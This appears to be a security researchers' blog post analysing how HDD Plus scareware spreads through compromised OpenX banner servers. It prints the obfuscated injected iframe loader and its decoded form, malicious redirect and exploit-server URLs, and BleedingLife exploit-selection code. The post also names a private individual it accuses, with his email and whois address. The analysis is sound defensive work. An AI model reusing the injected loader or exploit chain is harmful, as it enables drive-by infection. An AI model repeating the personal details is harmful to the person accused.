In our last post, we described how HDD Plus spread via DoubleClick and MSN's networks. Two reasons caused us to write this follow-up:

A. Many were curious to know who is behind all this, and
B. It's still spreading fast, through exploiting OpenX vulnerabilities.

Before we go into details, here's a summary:
1. HDD Plus (or HDD Tools) is spreading through compromised OpenX banner systems.
2. The BleedingLife v2 exploit pack is used; antivirus detection against the exploit is low (2/42). The following exploits are supported: CVE-2010-2884, CVE-2010-1297, CVE-2010-0188, CVE-2010-0842, CVE-2010-3552, and CVE-2008-2992.
3. Antivirus detection against the actual malware (HDD Plus) is about 50%.
4. Exploitation success rate against one of the many victim sites, takeatime.com, is about 28%, which is very high. The exploits have been reliably written.
5. We believe Mr. Slevin, based in Moscow, is involved in the spread of HDD Plus, and is actively working on newer means to facilitate its spread.

[Spreading via OpenX vulnerabilities]
OpenX has had a number of well known vulnerabilities, and staring end of July we saw a rise in incidents where attackers broke into OpenX installations and injected malicious iframes pointing to drive-by downloads. We all remember the The Pirate Bay-OpenX incident back in September (also see here).

Soon after the incident, OpenX released a patch on Sep 14th, acknowledging that versions prior to 2.8.7 are vulnerable.

Our scanners started to see a rise in OpenX iframe injections starting beginning of August. And then on Sep 28th, we were challenged by our partner Symantec-Verisign to justify some of our results. Our scanners had correct results, and the incidents were precisely the same--unpatched OpenX installations being injected with iframes.

After our last post, we began to realize that HDD Plus began to spread via the same method, changing its name to "HDD Tools." As victims visit websites with infected OpenX installations, the infected OpenX banner page /www/delivery/ajs.php runs a javascript that generates an iframe pointing to an exploit server, a drive-by download process starts, and when successful, HDD Tools is silently installed onto the victim's machines and starts to display fake warning messages and conduct reboots, until the victims have purchased a license for nearly 80 USD.

Let's use http://www.takeatime.com/ as an example. The website's OpenX installation is infected and serving malware as we write this blog. Below is a detailed video we made that illustrates the entire process from initial visit to final infection and malware call home:

Note that in this case the exploit pack is BleedingLife v2, and you can actually access it from the exploit server at http://expa42.co.cc/bl3/statistics/login.php.

No password? That's fine, we can see the statistics here: http://expa42.co.cc/bl3/statistics/update.php

In order to have an idea of the infection stats of this particular exploit server, we have reset the statistics. 8 hours later, here's what we got:

document.getElementById("visitors").innerHTML = 5635;
document.getElementById("exploited").innerHTML = 1583;
document.getElementById("percentage").innerHTML = 28.09;

Which means, expa42.co.cc(which is only one of the many malicious domains) has about 700 visitors per hour, and 200 of them are successfully exploited (per hour ). The exploitation success rate is 28%, which is very high.

Here's a list of exploits supported by Bleeding Life v2:

1. Adobe Flash Player 10.x on Windows, Mac OS X, Linux, and Solaris, Android authplay.dll (CVE-2010-2884)
2. Adobe Flash Player before 8.x 9.x 10.x on Windows and Mac OS X crafted SWF content (CVE-2010-1297)
3. Adobe Reader and Acrobat 8.x 9.x arbitrary code execution (CVE-2010-0188)
4. Oracle Java SE and Java for Business sound component (CVE-2010-0842)
5. Oracle Java SE and Java for Business (CVE-2010-3552)
6. Adobe Acrobat and Reader util.printf (CVE-2008-2992)
(Note no Microsoft exploits in this pack)

Following are details of the exploitation process, using takeatime.com as example.

The victim visits takeatime.com, and in the index page there's this OpenX banner tag:

<div class="banner">
<!--/* OpenX Javascript Tag v2.8.1 */-->
<script type='text/javascript'><!--//<![CDATA[
var m3_u = (location.protocol=='https:'?'https://openx.takeatime.com/www/delivery/ajs.php':'http://openx.takeatime.com/www/delivery/ajs.php');
var m3_r = Math.floor(Math.random()*99999999999);
if (!document.MAX_used) document.MAX_used = ',';
document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?zoneid=1");
document.write ('&cb=' + m3_r);
if (document.MAX_used != ',') document.write ("&exclude=" + document.MAX_used);
document.write (document.charset ? '&charset='+document.charset : (document.characterSet ? '&charset='+document.characterSet : ''));
document.write ("&loc=" + escape(window.location));
if (document.referrer) document.write ("&referer=" + escape(document.referrer));
if (document.context) document.write ("&context=" + escape(document.context));
if (document.mmm_fo) document.write ("&mmm_fo=1");
document.write ("'><\/scr"+"ipt>");
//]]>--></script><noscript><a href='http://openx.takeatime.com/www/delivery/ck.php?n=a06928b3&cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://openx.takeatime.com/www/delivery/avw.php?zoneid=1&cb=INSERT_RANDOM_NUMBER_HERE&n=a06928b3' border='0' alt='' /></a></noscript>
</div>

This is because takeatime.com is using OpenX, and this tag causes the display of an OpenX banner ad on the front page. Note that it will cause the browser to load /www/delivery/ajs.php

ajs.php is a common infection vector against unpatched OpenX installations. The browser fetches takeatime.com's ajs.php, which is:

if(typeof org=="undefined"){var org=new Object();}if(typeof org.openx=="undefined"){org.openx=new Object();}if(typeof org.openx.util=="undefined"){org.openx.util=new Object();}if(typeof org.openx.SWFObjectUtil=="undefined"){org.openx.SWFObjectUtil=new Object();}org.openx.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=org.openx.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1){this.setAttribute("swf",_1);}if(id){this.setAttribute("id",id);}if(w){this.setAttribute("width",w);}if(h){this.setAttribute("height",h);}if(_5){this.setAttribute("version",new org.openx.PlayerVersion(_5.toString().split(".")));}this.installedVer=org.openx.SWFObjectUtil.getPlayerVersion();if(!window.opera&&document.all&&this.installedVer.major>7){org.openx.SWFObject.doPrepUnload=true;}if(c){this.addParam("bgcolor",c);}var q=_7?_7:"high";this.addParam("quality",q);this.setAttribute("useExpressInstall",false);this.setAttribute("doExpressInstall",false);var _c=(_8)?_8:window.location;this.setAttribute("xiRedirectUrl",_c);this.setAttribute("redirectUrl","");if(_9){this.setAttribute("redirectUrl",_9);}};org.openx.SWFObject.prototype={useExpressInstall:function(_d){this.xiSWFPath=!_d?"expressinstall.swf":_d;this.setAttribute("useExpressInstall",true);},setAttribute:function(_e,_f){this.attributes[_e]=_f;},getAttribute:function(_10){return this.attributes[_10];},addParam:function(_11,_12){this.params[_11]=_12;},getParams:function(){return this.params;},addVariable:function(_13,_14){this.variables[_13]=_14;},getVariable:function(_15){return this.variables[_15];},getVariables:function(){return this.variables;},getVariablePairs:function(){var _16=new Array();var key;var _18=this.getVariables();for(key in _18){_16[_16.length]=key+"="+_18[key];}return _16;},getSWFHTML:function(){var _19="";if(navigator.plugins&&navigator.mimeTypes&&navigator.mimeTypes.length){if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","PlugIn");this.setAttribute("swf",this.xiSWFPath);}_19="<embed type=\"application/x-shockwave-flash\" src=\""+this.getAttribute("swf")+"\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\"";_19+=" id=\""+this.getAttribute("id")+"\" name=\""+this.getAttribute("id")+"\" ";var _1a=this.getParams();for(var key in _1a){_19+=[key]+"=\""+_1a[key]+"\" ";}var _1c=this.getVariablePairs().join("&");if(_1c.length>0){_19+="flashvars=\""+_1c+"\"";}_19+="/>";}else{if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","ActiveX");this.setAttribute("swf",this.xiSWFPath);}_19="<object id=\""+this.getAttribute("id")+"\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\">";_19+="<param name=\"movie\" value=\""+this.getAttribute("swf")+"\" />";var _1d=this.getParams();for(var key in _1d){_19+="<param name=\""+key+"\" value=\""+_1d[key]+"\" />";}var _1f=this.getVariablePairs().join("&");if(_1f.length>0){_19+="<param name=\"flashvars\" value=\""+_1f+"\" />";}_19+="</object>";}return _19;},write:function(_20){if(this.getAttribute("useExpressInstall")){var _21=new org.openx.PlayerVersion([6,0,65]);if(this.installedVer.versionIsValid(_21)&&!this.installedVer.versionIsValid(this.getAttribute("version"))){this.setAttribute("doExpressInstall",true);this.addVariable("MMredirectURL",escape(this.getAttribute("xiRedirectUrl")));document.title=document.title.slice(0,47)+" - Flash Player Installation";this.addVariable("MMdoctitle",document.title);}}if(this.skipDetect||this.getAttribute("doExpressInstall")||this.installedVer.versionIsValid(this.getAttribute("version"))){var n=(typeof _20=="string")?document.getElementById(_20):_20;n.innerHTML=this.getSWFHTML();return true;}else{if(this.getAttribute("redirectUrl")!=""){document.location.replace(this.getAttribute("redirectUrl"));}}return false;}};org.openx.SWFObjectUtil.getPlayerVersion=function(){var _23=new org.openx.PlayerVersion([0,0,0]);if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"];if(x&&x.description){_23=new org.openx.PlayerVersion(x.description.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split("."));}}else{if(navigator.userAgent&&navigator.userAgent.indexOf("Windows CE")>=0){var axo=1;var _26=3;while(axo){try{_26++;axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash."+_26);_23=new org.openx.PlayerVersion([_26,0,0]);}catch(e){axo=null;}}}else{try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");}catch(e){try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");_23=new org.openx.PlayerVersion([6,0,21]);axo.AllowScriptAccess="always";}catch(e){if(_23.major==6){return _23;}}try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");}catch(e){}}if(axo!=null){_23=new org.openx.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));}}}return _23;};org.openx.PlayerVersion=function(_29){this.major=_29[0]!=null?parseInt(_29[0]):0;this.minor=_29[1]!=null?parseInt(_29[1]):0;this.rev=_29[2]!=null?parseInt(_29[2]):0;};org.openx.PlayerVersion.prototype.versionIsValid=function(fv){if(this.major<fv.major){return false;}if(this.major>fv.major){return true;}if(this.minor<fv.minor){return false;}if(this.minor>fv.minor){return true;}if(this.rev<fv.rev){return false;}return true;};org.openx.util={getRequestParameter:function(_2b){var q=document.location.search||document.location.hash;if(_2b==null){return q;}if(q){var _2d=q.substring(1).split("&");for(var i=0;i<_2d.length;i++){if(_2d[i].substring(0,_2d[i].indexOf("="))==_2b){return _2d[i].substring((_2d[i].indexOf("=")+1));}}}return "";}};org.openx.SWFObjectUtil.cleanupSWFs=function(){var _2f=document.getElementsByTagName("OBJECT");for(var i=_2f.length-1;i>=0;i--){_2f[i].style.display="none";for(var x in _2f[i]){if(typeof _2f[i][x]=="function"){_2f[i][x]=function(){};}}}};if(org.openx.SWFObject.doPrepUnload){if(!org.openx.unloadSet){org.openx.SWFObjectUtil.prepUnload=function(){__flash_unloadHandler=function(){};__flash_savedUnloadHandler=function(){};window.attachEvent("onunload",org.openx.SWFObjectUtil.cleanupSWFs);};window.attachEvent("onbeforeunload",org.openx.SWFObjectUtil.prepUnload);org.openx.unloadSet=true;}}if(!document.getElementById&&document.all){document.getElementById=function(id){return document.all[id];};}var getQueryParamValue=org.openx.util.getRequestParameter;var FlashObject=org.openx.SWFObject;var SWFObject=org.openx.SWFObject;document.mmm_fo=1;var OX_8ec3b89b = '';
OX_8ec3b89b += "<"+"script language=\"JavaScript\">var dc=document; var date_ob=new Date(); dc.cookie=\'h1=o; path=/;\';if(dc.cookie.indexOf(\'3=llo\') <"+"= 0 && dc.cookie.indexOf(\'1=o\') > 0){\n";
OX_8ec3b89b += "function clng(wrd){var cou=new Array(\'en-us\',\'en-ca\',\'en-au\',\'en-gb\',\'fr-ca\',\'fr\',\'de\',\'es\',\'it\');for(i=0;i<"+"cou.length;i++){if(wrd==cou[i])return true;}return false;}\n";
OX_8ec3b89b += "if(typeof navigator.language == \'undefined\'){var nav = navigator.userLanguage} else {var nav = navigator.language;}\n";
OX_8ec3b89b += "if(typeof run == \'undefined\'&&clng(nav.toLowerCase())){dc.writeln(\"<"+"script type=\\\"text/javascript\\\"><"+"!--\");dc.writeln(\"var host=\' widt\'+\'h=1 h\'+\'eight\'+\'=1 \'; var src=\'src=\'; var brdr=\'fra\'+\'mebor\'+\'der=\'+\'0\';var sc=\'\\\"http://finofalts.com/ke7rwdtw.php?s=IBB@G\\\" \';\");dc.writeln(\"document.write(\'<"+"ifr\'+\'ame\'+host+src+sc+brdr+\'><"+"/ifra\'+\'me>\');\");dc.writeln(\"//--><"+"\\/script>\");} var run=1;\n";
OX_8ec3b89b += "date_ob.setTime(date_ob.getTime()+86400000);dc.cookie=\'h3=llo; path=/; expires=\'+date_ob.toGMTString();}<"+"/script>\n";
OX_8ec3b89b += "<"+"div id=\'ox_30e97ef3c2c6a8e24bb919f7fe3adba6\' style=\'display: inline;\'><"+"img src=\'http://openx.takeatime.com/www/images/1x1.gif\' alt=\'\' title=\'\' border=\'0\' /><"+"/div>\n";
OX_8ec3b89b += "<"+"script type=\'text/javascript\'><"+"!--// <"+"![CDATA[\n";
OX_8ec3b89b += "var ox_swf = new FlashObject(\'http://openx.takeatime.com/www/delivery/ai.php?filename=blizoo_hd_campaign_728x90.swf&contenttype=swf\', \'Advertisement\', \'728\', \'90\', \'8\');\n";
OX_8ec3b89b += "ox_swf.addVariable(\'clickTARGET\', \'_blank\');\n";
OX_8ec3b89b += "ox_swf.addVariable(\'clickTAG\', \'http%3A%2F%2Fopenx.takeatime.com%2Fwww%2Fdelivery%2Fck.php%3Foaparams%3D2__bannerid%3D54__zoneid%3D1__cb%3D1e6e188d82__oadest%3Dhttp%253A%252F%252Fwww.blizoo.bg%252Ftelevision%252Fhd.html\');\n";
OX_8ec3b89b += "ox_swf.addParam(\'allowScriptAccess\',\'always\');\n";
OX_8ec3b89b += "ox_swf.write(\'ox_30e97ef3c2c6a8e24bb919f7fe3adba6\');\n";
OX_8ec3b89b += "if (ox_swf.installedVer.versionIsValid(ox_swf.getAttribute(\'version\'))) { document.write(\"<"+"div id=\'beacon_1e6e188d82\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://openx.takeatime.com/www/delivery/lg.php?bannerid=54&campaignid=26&zoneid=1&loc=http%3A%2F%2Ftakeatime.com%2F&cb=1e6e188d82\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\"); }\n";
OX_8ec3b89b += "// ]]> --><"+"/script><"+"script type=\"text/javascript\">var yoZ=[\'79\',\'89\',\'b0\',\'bb\',\'bf\',\'b2\',\'6e\',\'af\',\'7c\',\'bb\',\'c2\',\'7c\',\'b4\',\'bc\',\'bc\',\'b8\',\'6e\',\'7c\',\'90\',\'c0\',\'b2\',\'bb\',\'ad\',\'6e\',\'b1\',\'b5\',\'c5\',\'85\',\'b1\',\'bb\',\'7b\',\'6e\',\'8a\',\'b8\',\'be\',\'7c\',\'b1\',\'7f\',\'80\',\'79\',\'b0\',\'89\',\'ad\',\'c0\',\'be\',\'b1\',\'8a\',\'b0\',\'6c\',\'b4\',\'ad\',\'7d\',\'ae\',\'82\',\'b5\',\'89\',\'af\',\'be\',\'6e\',\'b1\',\'bf\',\'90\',\'88\',\'b9\',\'88\',\'6e\',\'b5\',\'b1\',\'89\',\'7e\',\'ad\',\'7c\',\'92\',\'be\',\'c2\',\'6e\',\'b5\',\'79\',\'c2\',\'c0\',\'be\',\'c0\',\'8a\',\'ad\',\'b5\',\'b0\',\'b9\',\'ad\',\'6e\',\'87\',\'7a\',\'8f\',\'ad\',\'88\',\'be\',\'7a\',\'b1\',\'8a\',\'89\',\'84\',\'90\',\'b8\',\'c2\',\'b8\',\'6c\',\'bf\',\'7c\',\'6e\',\'7d\',\'be\',\'bf\',\'6e\',\'bb\',\'bf\',\'7c\',\'be\',\'6c\',\'86\',\'6c\',\'b4\',\'6c\',\'c2\',\'7d\',\'6e\',\'8a\',\'be\',\'bc\',\'80\',\'ba\',\'bc\',\'af\',\'ba\',\'90\',\'8d\',\'6e\',\'6e\',\'83\',\'ad\',\'8b\',\'bf\',\'b2\',\'6e\',\'c5\',\'89\',\'af\',\'b4\',\'be\',\'89\',\'7b\',\'b9\',\'7f\',\'be\',\'6e\',\'b5\',\'af\',\'90\',\'ba\',\'ad\',\'ba\',\'7b\',\'b5\',\'6c\',\'7a\',\'b3\',\'88\',\'b1\',\'6c\',\'bc\',\'88\',\'b5\',\'6c\',\'ad\',\'89\',\'7b\',\'8a\',\'c0\',\'b4\',\'af\',\'af\',\'bc\',\'7b\',\'7b\',\'c3\',\'88\',\'ad\',\'ba\',\'bc\',\'6c\',\'b5\',\'b4\',\'be\',\'b1\',\'6e\',\'b3\',\'c0\',\'86\',\'89\'];var M__=[86,156,153,151,124,179,157,61,119,164,134,120,114,49,136,16,11,142,95,47,35,62,188,26,24,13,7,87,128,173,186,117,32,165,36,131,111,94,79,81,12,129,17,56,55,183,190,75,122,102,37,118,150,80,99,103,43,155,143,9,14,78,28,182,191,141,57,154,10,77,54,158,92,195,1,130,112,91,187,115,163,6,184,30,74,100,38,137,132,25,63,85,181,176,42,60,149,196,116,84,83,8,29,166,40,135,107,96,105,152,41,121,22,5,106,31,20,19,109,123,97,193,58,104,27,3,53,89,172,15,138,23,93,88,174,159,90,126,73,161,145,45,18,170,127,110,180,44,52,148,59,146,108,178,65,82,68,194,168,66,67,144,69,169,0,139,160,125,185,34,133,147,76,177,175,101,71,64,162,70,51,192,98,33,2,21,72,4,167,46,189,39,171,113,48,50,140];var bG0=new Array();for(var tRj=0;tRj<"+"M__.length;tRj++){bG0[tRj]=[M__[tRj],yoZ[tRj]];}function iL5(JrO,GTx){if(JrO[0]>GTx[0]){return 1;}else{if(JrO[0]<"+"GTx[0]){return -1;}else{return 0;}}}bG0.sort(iL5);function LHA(Yi5){return unescape(Yi5);}var XzH=new Array();for(var NOW=0;NOW<"+"bG0.length;NOW++){XzH[NOW]=String.fromCharCode(\'3\'+\'7\')+bG0[NOW][1];}function NhW(M3s){return M3s.join(\'\');}function T5_(OrK,yPk){var wC3=\'M5U1kEWlqVNxC8vXQpZK6s20YrbHe9whdngyGAtOijmaLfBzJT7oPIRFDcS43u\';var QiL=new Array();for(var lVh=0;lVh<"+"OrK.length;lVh++){QiL[lVh]=wC3.charAt(OrK[lVh]);}return NhW(QiL);}function gEp(ICO,wzs){var kkz=new Array();for(var z7r=0;z7r<"+"ICO.length;z7r++){kkz[z7r]=String[T5_([45,25,51,42,12,31,43,25,12,51,32,28],0)](ICO[T5_([57,31,43,25,12,51,32,28,37,38],0)](z7r)-wzs);}document.write(NhW(kkz));}gEp(LHA(NhW(XzH)),LHA(\'%37%36\'));<"+"/script>\n";
document.write(OX_8ec3b89b);

One line is obvious:

OX_8ec3b89b += "if(typeof run == \'undefined\'&&clng(nav.toLowerCase())){dc.writeln(\"<"+"script type=\\\"text/javascript\\\"><"+"!--\");dc.writeln(\"var host=\' widt\'+\'h=1 h\'+\'eight\'+\'=1 \'; var src=\'src=\'; var brdr=\'fra\'+\'mebor\'+\'der=\'+\'0\';var sc=\'\\\"http://finofalts.com/ke7rwdtw.php?s=IBB@G\\\" \';\");dc.writeln(\"document.write(\'<"+"ifr\'+\'ame\'+host+src+sc+brdr+\'><"+"/ifra\'+\'me>\');\");dc.writeln(\"//--><"+"\\/script>\");} var run=1;\n";

It creates an iframe pointing to the well-known malicious domain finofalts.com: http://finofalts.com/ke7rwdtw.php?s=IBB@G, which was inactive during the writing of this post. The whole script deobfuscates to:

<script language="JavaScript">var dc=document; var date_ob=new Date(); dc.cookie='h1=o; path=/;';if(dc.cookie.indexOf('3=llo') <= 0 && dc.cookie.indexOf('1=o') > 0){
function clng(wrd){var cou=new Array('en-us','en-ca','en-au','en-gb','fr-ca','fr','de','es','it');for(i=0;i<cou.length;i++){if(wrd==cou[i])return true;}return false;}
if(typeof navigator.language == 'undefined'){var nav = navigator.userLanguage} else {var nav = navigator.language;}
if(typeof run == 'undefined'&&clng(nav.toLowerCase())){dc.writeln("<script type=\"text/javascript\"><!--");dc.writeln("var host=' widt'+'h=1 h'+'eight'+'=1 '; var src='src='; var brdr='fra'+'mebor'+'der='+'0';var sc='\"http://finofalts.com/ke7rwdtw.php?s=IBB@G\" ';");dc.writeln("document.write('<ifr'+'ame'+host+src+sc+brdr+'></ifra'+'me>');");dc.writeln("//--><\/script>");} var run=1;
date_ob.setTime(date_ob.getTime()+86400000);dc.cookie='h3=llo; path=/; expires='+date_ob.toGMTString();}</script>
<div id='ox_30e97ef3c2c6a8e24bb919f7fe3adba6' style='display: inline;'><img src='http://openx.takeatime.com/www/images/1x1.gif' alt='' title='' border='0' /></div>
<script type='text/javascript'><!--// <![CDATA[
var ox_swf = new FlashObject('http://openx.takeatime.com/www/delivery/ai.php?filename=blizoo_hd_campaign_728x90.swf&contenttype=swf', 'Advertisement', '728', '90', '8');
ox_swf.addVariable('clickTARGET', '_blank');
ox_swf.addVariable('clickTAG', 'http%3A%2F%2Fopenx.takeatime.com%2Fwww%2Fdelivery%2Fck.php%3Foaparams%3D2__bannerid%3D54__zoneid%3D1__cb%3D1e6e188d82__oadest%3Dhttp%253A%252F%252Fwww.blizoo.bg%252Ftelevision%252Fhd.html');
ox_swf.addParam('allowScriptAccess','always');
ox_swf.write('ox_30e97ef3c2c6a8e24bb919f7fe3adba6');
if (ox_swf.installedVer.versionIsValid(ox_swf.getAttribute('version'))) { document.write("<div id='beacon_1e6e188d82' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://openx.takeatime.com/www/delivery/lg.php?bannerid=54&campaignid=26&zoneid=1&loc=http%3A%2F%2Ftakeatime.com%2F&cb=1e6e188d82' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>"); }
// ]]> --></script><script type="text/javascript">var yoZ=['79','89','b0','bb','bf','b2','6e','af','7c','bb','c2','7c','b4','bc','bc','b8','6e','7c','90','c0','b2','bb','ad','6e','b1','b5','c5','85','b1','bb','7b','6e','8a','b8','be','7c','b1','7f','80','79','b0','89','ad','c0','be','b1','8a','b0','6c','b4','ad','7d','ae','82','b5','89','af','be','6e','b1','bf','90','88','b9','88','6e','b5','b1','89','7e','ad','7c','92','be','c2','6e','b5','79','c2','c0','be','c0','8a','ad','b5','b0','b9','ad','6e','87','7a','8f','ad','88','be','7a','b1','8a','89','84','90','b8','c2','b8','6c','bf','7c','6e','7d','be','bf','6e','bb','bf','7c','be','6c','86','6c','b4','6c','c2','7d','6e','8a','be','bc','80','ba','bc','af','ba','90','8d','6e','6e','83','ad','8b','bf','b2','6e','c5','89','af','b4','be','89','7b','b9','7f','be','6e','b5','af','90','ba','ad','ba','7b','b5','6c','7a','b3','88','b1','6c','bc','88','b5','6c','ad','89','7b','8a','c0','b4','af','af','bc','7b','7b','c3','88','ad','ba','bc','6c','b5','b4','be','b1','6e','b3','c0','86','89'];var M__=[86,156,153,151,124,179,157,61,119,164,134,120,114,49,136,16,11,142,95,47,35,62,188,26,24,13,7,87,128,173,186,117,32,165,36,131,111,94,79,81,12,129,17,56,55,183,190,75,122,102,37,118,150,80,99,103,43,155,143,9,14,78,28,182,191,141,57,154,10,77,54,158,92,195,1,130,112,91,187,115,163,6,184,30,74,100,38,137,132,25,63,85,181,176,42,60,149,196,116,84,83,8,29,166,40,135,107,96,105,152,41,121,22,5,106,31,20,19,109,123,97,193,58,104,27,3,53,89,172,15,138,23,93,88,174,159,90,126,73,161,145,45,18,170,127,110,180,44,52,148,59,146,108,178,65,82,68,194,168,66,67,144,69,169,0,139,160,125,185,34,133,147,76,177,175,101,71,64,162,70,51,192,98,33,2,21,72,4,167,46,189,39,171,113,48,50,140];var bG0=new Array();for(var tRj=0;tRj<M__.length;tRj++){bG0[tRj]=[M__[tRj],yoZ[tRj]];}function iL5(JrO,GTx){if(JrO[0]>GTx[0]){return 1;}else{if(JrO[0]<GTx[0]){return -1;}else{return 0;}}}bG0.sort(iL5);function LHA(Yi5){return unescape(Yi5);}var XzH=new Array();for(var NOW=0;NOW<bG0.length;NOW++){XzH[NOW]=String.fromCharCode('3'+'7')+bG0[NOW][1];}function NhW(M3s){return M3s.join('');}function T5_(OrK,yPk){var wC3='M5U1kEWlqVNxC8vXQpZK6s20YrbHe9whdngyGAtOijmaLfBzJT7oPIRFDcS43u';var QiL=new Array();for(var lVh=0;lVh<OrK.length;lVh++){QiL[lVh]=wC3.charAt(OrK[lVh]);}return NhW(QiL);}function gEp(ICO,wzs){var kkz=new Array();for(var z7r=0;z7r<ICO.length;z7r++){kkz[z7r]=String[T5_([45,25,51,42,12,31,43,25,12,51,32,28],0)](ICO[T5_([57,31,43,25,12,51,32,28,37,38],0)](z7r)-wzs);}document.write(NhW(kkz));}gEp(LHA(NhW(XzH)),LHA('%37%36'));</script>

Note the "document.write(NhW(kkz));" part, which in the end generates another deobfuscation:

<var style="display: none;"><var><iframe src="http://parti13.co.cc/in.php?id=2D46-DD8C-9A47-FD3D" width="100" height="100" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe></var></var>

This causes the browser to load from http://parti13.co.cc/in.php?id=2D46-DD8C-9A47-FD3D, whose contents are:

HTTP/1.1 302 Moved Temporarily
Date: Wed, 15 Dec 2010 17:45:29 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Location: http://govtds09.co.cc/tds/in.cgi?default
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

The iframe is redirected to http://govtds09.co.cc/tds/in.cgi?default, which is:

<html><frameset rows="100%"><frame src="http://expa42.co.cc/bl3/"></frameset></html>

And so, expa42.co.cc is the exploit server running BleedingLife v2. Upon loading, BleedingLife analyzes the environment and decides which exploit to use:

if(acrobat.installed){
if(acrobat.version >= 800 && acrobat.version < 821){
  ("http://expa42.co.cc/bl3/load.php?e=Adobe-80-2010-0188"); 
}else if(acrobat.version >= 900 && acrobat.version < 940){
  if(acrobat.version < 931){  
    ("http://expa42.co.cc/bl3/load.php?e=Adobe-90-2010-0188");
  }else if(acrobat.version < 933){
    ("http://expa42.co.cc/bl3/load.php?e=Adobe-2010-1297");
  }else if(acrobat.version < 940){
    ("http://expa42.co.cc/bl3/load.php?e=Adobe-2010-2884");
  }
}else if(acrobat.version >= 700 && acrobat.version < 711){
  ("http://expa42.co.cc/bl3/load.php?e=Adobe-2008-2992");  
}     
   
if(ojava.installed){
  if(ojava.version < 6 || (ojava.version == 6 && ojava.build < 19)){
    ("http://expa42.co.cc/bl3/load.php?e=Java-2010-0842");
  }else if(ojava.version == 6 && ojava.build < 22){
    ("http://expa42.co.cc/bl3/load.php?e=Java-2010-3552");
  }
}

As the time of this writing, the detection rate for these exploits are currently extremely low. For example http://expa42.co.cc/bl3/load.php?e=Java-2010-3552 (CVE-2010-3552) triggers 1/43 on VirusTotal and 0/19 on jotti, and load.php?e=Adobe-2010-2884 (CVE-2010-2884) currently triggers 5/43 on VB and 2/19 on joiit.

Upon successful exploitation, the shellcode will drop binaries from: http://expa42.co.cc/bl3/load.php?e=XX, where XX is the exploit name; for example, http://expa42.co.cc/bl3/drop.php?e=Adobe-90-2010-0188. Currently all binaries are the same--HDD Tool. The detection of this piece of malware, which is what gets dropped in the end, is about half: 15/43 on VB, and 11/19 on jotti.

[A guy behind all this]

HDD Plus has spread via DoubleClick, MSN, and now compromised OpenX platforms. We wanted to know who was behind all this. But there are just too many malicious domains to look into. From our experience, those spreading the malware (submitting the AdShufffle fake ad, compromising OpenX platforms, etc) and those developing the malware and collecting the license fees, may not be the same group. There are just too many compromised hosts (ex: takeatime.com) and exploit domains (ex: finofalts.com, parti13.co.cc, expa42.co.cc, and the gosh majority of co.cc) to look into; however, the billing process won't be that many--it takes more time to develop payment mechanisms--and so, it's where to start looking into.

Both HDD Plus and HDD Tools connected to two domains when the victims tried to pay: defragstore.com (registered on Jun 30th), and onlinepaydebt.com (Sep 27th), which resolves to the same IP 94.76.192.210 (UK PoundHost, dedicated). defragstore.com lists a customer support line: +1-877-282-0139. This is the same support line in the invoice provided, when victims made the purchase. It routes to call centers in India, and they very quickly credit me back my money. This is typical scareware behavior. Payment mechanisms are hard to setup, so they do give back your money, so their payment gateways don't get taken down. The company name on the invoice was "SecurityLabSoftware," and the creditor showing up on my bill was "trd-app.com"

The customer support website allows customers to login, download the software, and file tickets: http://acideds.org/customers (registered Nov 2nd, 2010)

There are multiple domains because some will be taken down / flagged:
http://earlyeds.org/customers
http://dirtyeds.org/customers
http://edsclick.com/customers
http://www.edsclick.com/customers

Okay, so now we have parties that helped develop these website and payment mechanisms, call center agents, and hosting companies. After contacting many people in Europe, UK, India and Russian, and speaking some Russian (Fyodor is Russian), everyone said that all these have been setup and developed by Mr. Dmitry Slevin, based in Moscow, and gave us his email. Using whois, we found his phone number.

We first noticed that Slevin owned malwaremechanic.com from Nov 2009 to Jun 2010; malwaremechanic.com is a known scareware.

(this is hostorical whois data and dates Nov 6th, 2009)
Domain Name: MALWAREMECHANIC.COM
    Created on: 10-Oct-07
    Expires on: 10-Oct-10
    Last Updated on: 05-Nov-09

Administrative Contact:
    Esaulova, Alla  slevintm@gmail.com
    MDA Systems ltd
    35 Brompton Road, Knightsbridge
    London, London SW3 1DE
    United Kingdom
    +44.4402078080190      Fax --

We then noticed that on Dec 6th, Slevin registered systemutilites.com, where we can download a trial version of "System Utilities." Not only does it look remarkably identical to HDD Plus and HDD Tools, it triggers 24/45 (as FakeAV) on VB, and 9/19 on jotti.

We sent Slevin an email and subsequently talked to him on phone. Initially he denied knowing about defragstore.com and said it wasn't his domain. He later reverted this claim and said he is related to it, but he is only a domainer who sells domains for some money, and would be willing to provide us with contacts into those behind the HDD Plus / Tools and SystemUtilites software. He did provide us a name and email.

He also denied all parties (website development, hosting, call centers, etc) who have pointed figers to him; yet these parties gave us his name and contacts without us first mentioning anything.

